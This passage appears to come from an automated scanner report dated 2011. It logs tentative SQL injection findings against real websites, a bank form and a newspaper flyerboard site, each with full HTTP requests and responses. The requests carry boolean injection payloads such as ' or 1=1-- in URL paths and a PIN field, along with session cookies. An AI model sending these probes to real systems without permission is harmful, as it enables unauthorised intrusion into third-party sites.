Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192
Content-Length: 3109

__EVENTTARGET=&__EVENTARGUMENT=&DES_Group=FORMINPUT&__VIEWSTATE=xHIh9vjHCP7V7FlwYd0dybomkcrXFi85zGyDNyxO4%2FVfU4gFk56iSPraFK2Fb5m%2FVmSSQkqJSJ9Sd9dg4uCnywmz5oW6bxAuLaWjTNif0yED1YLSSBrlZTehbSWX1peYLbbL
...[SNIP]...
ntPlaceHolder1%24txtATMCheck1=&ctl00%24ContentPlaceHolder1%24txtATMCheck2=&ctl00%24ContentPlaceHolder1%24txtATMCheck3=&ctl00%24ContentPlaceHolder1%24txtATMCheck4=&ctl00%24ContentPlaceHolder1%24txtPin=15752462'%20or%201%3d2--%20&ctl00%24ContentPlaceHolder1%24txtExpirationDate=&ctl00%24ContentPlaceHolder1%24txtCDV=&ctl00%24ContentPlaceHolder1%24btnGetting_StartedContinue.x=30&ctl00%24ContentPlaceHolder1%24btnGetting_StartedCo
...[SNIP]...

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:24:22 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 10148


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...
STATE" id="__VIEWSTATE" value="ejI4XQ0S2loR+l0OfQ1EdYDWVJyr/6vzrIlcFy6iv8O0PXGX0SJfs2E9T7qPj3oS7yMo1fQ3FY1vVGgKbmM9qWeuCfRzvDvha896+i9Q7z+smQNa1zqYtlVwyXOyAhr/EmQZox2KsV02il8iDBCYlzXhyE4KFOtRfKPiQBsp8zB1vg4fXfkHkm3QKlDinaKgiELz7urShH9voX1iKDX/JMW/AUaYpRy9bESpikttIvvWGF3bUtM2TIKJ9kDcWM3YiXiP7d9lPY5yGpbpO+VgPm7yjf0AN2AsqkLGw+PM0amr44+srekoN6ivuT+4acuPt/hE1LR3zsEhC0zD/m8dEWpUqViZC2vWLyZFP3F69ZthRTV2b34E5ob5GKta8QNPFlQiPG10aufAKaWYUdfHdgxPV/TcBhDBh/EI/JHvJfuMSIXXlMXUrw/17vb8px541FATv6MplHUHlY8B2DrmrCsPiHpyOUkuyIzdeuJQGv+3WlgzLDfS3Pron70VaCrf3jc9JzAdJJ3CH3mxJpCc/ZYYjB9df/Fz/aNUbqAUa85JB/jfXOjdhxAhEABPZGzXG83S8wOkP9RJ5CbjpQnFvns8bM/NJg1p4cDYXAO8g88=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<input type='hidden' id='DES_JSE' name='DES_JSE' value='' />
<script type='text/javascript'>
//<![CDATA[

var vJDHF = document.getElementById ? document.getElementById('DES_JSE') : (document.all ? document.all['DES_JSE'] : null);
if (vJDHF){vJDHF.value='1';}
//]]>
</script>
<script type='text/javascript' src='/OAO/DESGetFiles.aspx?type=scripts&amp;version=4.0.5.5000&amp;files=0_51_54'></script>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="vb8s9pKtPLPv5TrDv9mEFfIv+yUfMcdfU3D48j4srjowFk0EaKr3GrgHsPYtfgYcN2OBMWXUzC6Wi3w4yh0eaA==" />
</div>
<div id="page">
<div id="mgMnuTop">
<div class="mnuTopLink">

<a title="Return to Regions.com" onclick="return HandleOnCancel();" target="_parent" href="javascript:__doPostBack('ctl00$ctl10','')">Return to Regions.com</a>
</div>
</div>
<div id="mgLogo">
<img src="https://www.regions.com/virtualMedia/img506.gif" alt="Regions Financial Corporation" />
</div>
<div id="mgBranding">

...[SNIP]...
1.5. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/albany-times-union/1552/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11082331%20or%201%3d1--%20 and 11082331%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/albany-times-union/155211082331%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/sitemap/albany-times-union/1552.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:21:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 3772


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />
   
   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div
...[SNIP]...

Request 2

GET /flyerboard/albany-times-union/155211082331%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/sitemap/albany-times-union/1552.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:21:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 1


1.6. http://www.paperg.com/flyerboard/app.com/1992/0.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/app.com/1992/0.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 89983410%20or%201%3d1--%20 and 89983410%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/app.com/199289983410%20or%201%3d1--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3772
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Flyerboard - NY Daily News" />
   
   <meta name="description" content = "NY Daily News NY Daily News Flyerboard, a community bulletin board." />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4/logo.gif" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div
...[SNIP]...

Request 2

GET /flyerboard/app.com/199289983410%20or%201%3d2--%20/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.7. http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/code-enforcement-officer/3017/30085.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16183801%20or%201%3d1--%20 and 16183801%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/code-enforcement-officer/301716183801%20or%201%3d1--%20/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:18:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3963
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - CODE ENFORCEMENT OFFICER - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "CODE ENFORCEMENT OFFICER" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/13905/0ad___162541.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
...[SNIP]...

Request 2

GET /flyerboard/code-enforcement-officer/301716183801%20or%201%3d2--%20/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:18:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.8. http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/code-enforcement-officer/3023/30085.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10005404%20or%201%3d1--%20 and 10005404%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/code-enforcement-officer/302310005404%20or%201%3d1--%20/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3963
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - CODE ENFORCEMENT OFFICER - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "CODE ENFORCEMENT OFFICER" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/13905/0ad___162541.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
...[SNIP]...

Request 2

GET /flyerboard/code-enforcement-officer/302310005404%20or%201%3d2--%20/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.9. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/conifer-park/1552/45966.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 25402272%20or%201%3d1--%20 and 25402272%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/conifer-park/155225402272%20or%201%3d1--%20/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3877
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Conifer Park - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Conifer Park" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4706/3conifer130513272445966.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
           <a href="https://www.paperg.com" target="_blank" rel="nofollow" ><div id="sponsor_logo"></div></a>
       </div>        
   
...[SNIP]...

Request 2

GET /flyerboard/conifer-park/155225402272%20or%201%3d2--%20/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1
Connection: close
Via: 1.1 AN-0016020122637050


1.10. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.paperg.com
Path:   /flyerboard/conifer-park/1753/45966.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 14633334%20or%201%3d1--%20 and 14633334%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /flyerboard/conifer-park/175314633334%20or%201%3d1--%20/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:20:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3877
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

   <title>Flyerboard - Conifer Park - NY Daily News</title>

       <meta http-equiv="imagetoolbar" content="false">
   <meta name="MSSmartTagsPreventParsing" content="true">

   <meta name="title" content = "Conifer Park" />
   
   <meta name="description" content = "" />
   
   <link rel="image_src" href="http://www.paperg.com/beta/user/4706/3conifer130513272445966.jpg" />

   <!--[if IE]>
   <link rel="stylesheet" type="text/css" href="/inc/ie.css">
   <![endif]-->
   <!--[if IE 6]>
   <link rel="stylesheet" type="text/css" href="/inc/style_no_colors_ie6.css" />
   <![endif]-->

   <style type="text/css">
       label {
           width: 70px;
           margin-right: 5px;
           text-align: 5px;
       }
       form {
           text-align: center;
       }



form#filters label {
display: block;
padding-top: 10px;
}
form#filters {
float: right;
width: 190px;
padding-top: 5px;
display: block;
text-align: left;
}

   </style>
   <link rel="stylesheet" type="text/css" href="https://www.paperg.com/inc/style_no_colors.css" media="all">
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
   <link rel="stylesheet" type="text/css" href="http://www.paperg.com/https/skin/csscache/0.css?version=18" media="screen"><base target=_top>
</head>
<body class="smaller">
   <!-- START : BACKGROUND BAR -->
   <div id="background_bar_container">
       <div id="background_bar">&nbsp;</div>
   </div>
   <!-- END : BACKGROUND BAR -->

   
   <div id="body-wrap">
       <!-- START: HEADER -->
       <div id="header">
